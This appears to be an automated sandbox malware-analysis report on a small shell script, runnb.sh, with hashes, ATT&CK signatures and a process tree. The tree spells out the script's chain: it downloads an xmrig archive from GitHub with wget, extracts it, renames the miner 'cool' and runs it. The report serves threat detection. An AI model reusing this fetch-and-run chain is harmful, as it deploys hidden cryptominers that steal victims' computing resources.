Analysis

  • max time kernel
    22s
  • max time network
    129s
  • platform
    ubuntu-22.04_amd64
  • resource
    ubuntu2204-amd64-20240611-en
  • resource tags

    arch:amd64, arch:i386, image:ubuntu2204-amd64-20240611-en, kernel:5.15.0-105-generic, locale:en-us, os:ubuntu-22.04-amd64, system
  • submitted
    30-10-2024 21:08

General

  • Target

    runnb.sh

  • Size

    213B

  • MD5

    a1189543e2f98f6696c6d857b899ab0a

  • SHA1

    30b167128357a05cb5ae4d8bd386d63839d99c4d

  • SHA256

    a5951456684af2a46da1bcd8c820221c97b13a439db465c2b671fa3180d838d6

  • SHA512

    472e7cd110beb4c0ff9990763988190c875dccecc726753e295d4419413bfd14ed867a9a5977adf2d6e87d6e80f18abbdd0a929473f02bbfb24e1531e71d7aef

Malware Config

Signatures

  • File and Directory Permissions Modification 1 TTPs 1 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • OS Credential Dumping 1 TTPs 1 IoCs

    Adversaries may attempt to dump credentials for use in password cracking.

  • Abuse Elevation Control Mechanism: Sudo and Sudo Caching 1 TTPs 1 IoCs

    Abuse sudo or cached sudo credentials to execute code.

  • Enumerates kernel/hardware configuration 1 TTPs 8 IoCs

    Reads contents of /sys virtual filesystem to enumerate system information.

  • Reads runtime system information 28 IoCs

    Reads data from /proc virtual filesystem.

Processes

  • /tmp/runnb.sh
    /tmp/runnb.sh
    1⤵
    PID:1577
    • /usr/bin/sudo
      sudo apt install wget
      2⤵
      • OS Credential Dumping
      • Abuse Elevation Control Mechanism: Sudo and Sudo Caching
      • Reads runtime system information
      PID:1578
      • /usr/bin/apt
        apt install wget
        3⤵
        • Reads runtime system information
        PID:1579
        • /usr/bin/dpkg
          /usr/bin/dpkg --print-foreign-architectures
          4⤵
          • Reads runtime system information
          PID:1580
        • /usr/bin/dpkg
          /usr/bin/dpkg --print-foreign-architectures
          4⤵
          • Reads runtime system information
          PID:1584
        • /bin/sh
          /bin/sh -c "[ ! -f /usr/bin/snap ] || /usr/bin/snap advise-snap --from-apt 2>/dev/null || true"
          4⤵
          PID:1585
          • /usr/bin/snap
            /usr/bin/snap advise-snap --from-apt
            5⤵
            • Enumerates kernel/hardware configuration
            • Reads runtime system information
            PID:1586
        • /bin/sh
          /bin/sh -c "[ ! -f /usr/bin/snap ] || /usr/bin/snap advise-snap --from-apt 2>/dev/null || true"
          4⤵
          PID:1591
          • /usr/bin/snap
            /usr/bin/snap advise-snap --from-apt
            5⤵
            • Enumerates kernel/hardware configuration
            • Reads runtime system information
            PID:1592
        • /bin/sh
          /bin/sh -c "[ ! -f /usr/bin/snap ] || /usr/bin/snap advise-snap --from-apt 2>/dev/null || true"
          4⤵
          PID:1597
          • /usr/bin/snap
            /usr/bin/snap advise-snap --from-apt
            5⤵
            • Enumerates kernel/hardware configuration
            • Reads runtime system information
            PID:1598
        • /bin/sh
          /bin/sh -c "[ ! -f /usr/bin/snap ] || /usr/bin/snap advise-snap --from-apt 2>/dev/null || true"
          4⤵
          PID:1604
          • /usr/bin/snap
            /usr/bin/snap advise-snap --from-apt
            5⤵
            • Enumerates kernel/hardware configuration
            • Reads runtime system information
            PID:1605
    • /usr/bin/apt
      apt install wget
      2⤵
      • Reads runtime system information
      PID:1610
      • /usr/bin/dpkg
        /usr/bin/dpkg --print-foreign-architectures
        3⤵
        • Reads runtime system information
        PID:1611
      • /usr/bin/dpkg
        /usr/bin/dpkg --print-foreign-architectures
        3⤵
        • Reads runtime system information
        PID:1612
      • /bin/sh
        /bin/sh -c "[ ! -f /usr/bin/snap ] || /usr/bin/snap advise-snap --from-apt 2>/dev/null || true"
        3⤵
        PID:1613
        • /usr/bin/snap
          /usr/bin/snap advise-snap --from-apt
          4⤵
          • Enumerates kernel/hardware configuration
          • Reads runtime system information
          PID:1614
      • /bin/sh
        /bin/sh -c "[ ! -f /usr/bin/snap ] || /usr/bin/snap advise-snap --from-apt 2>/dev/null || true"
        3⤵
        PID:1622
        • /usr/bin/snap
          /usr/bin/snap advise-snap --from-apt
          4⤵
          • Enumerates kernel/hardware configuration
          • Reads runtime system information
          PID:1623
      • /bin/sh
        /bin/sh -c "[ ! -f /usr/bin/snap ] || /usr/bin/snap advise-snap --from-apt 2>/dev/null || true"
        3⤵
        PID:1631
        • /usr/bin/snap
          /usr/bin/snap advise-snap --from-apt
          4⤵
          • Enumerates kernel/hardware configuration
          • Reads runtime system information
          PID:1632
      • /bin/sh
        /bin/sh -c "[ ! -f /usr/bin/snap ] || /usr/bin/snap advise-snap --from-apt 2>/dev/null || true"
        3⤵
        PID:1640
        • /usr/bin/snap
          /usr/bin/snap advise-snap --from-apt
          4⤵
          • Enumerates kernel/hardware configuration
          • Reads runtime system information
          PID:1641
    • /usr/bin/wget
      wget https://github.com/orkaroeli/orkaroeliminer/raw/refs/heads/main/xmrigtar.tar.gz
      2⤵
      PID:1647
    • /usr/bin/tar
      tar xvf xmrigtar.tar.gz
      2⤵
      • Reads runtime system information
      PID:1648
    • /usr/bin/chmod
      chmod +x xmrig
      2⤵
      • File and Directory Permissions Modification
      PID:1649
    • /usr/bin/mv
      mv xmrig cool
      2⤵
      • Reads runtime system information
      PID:1650
    • /tmp/cool
      ./cool
      2⤵
      PID:1651

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Downloads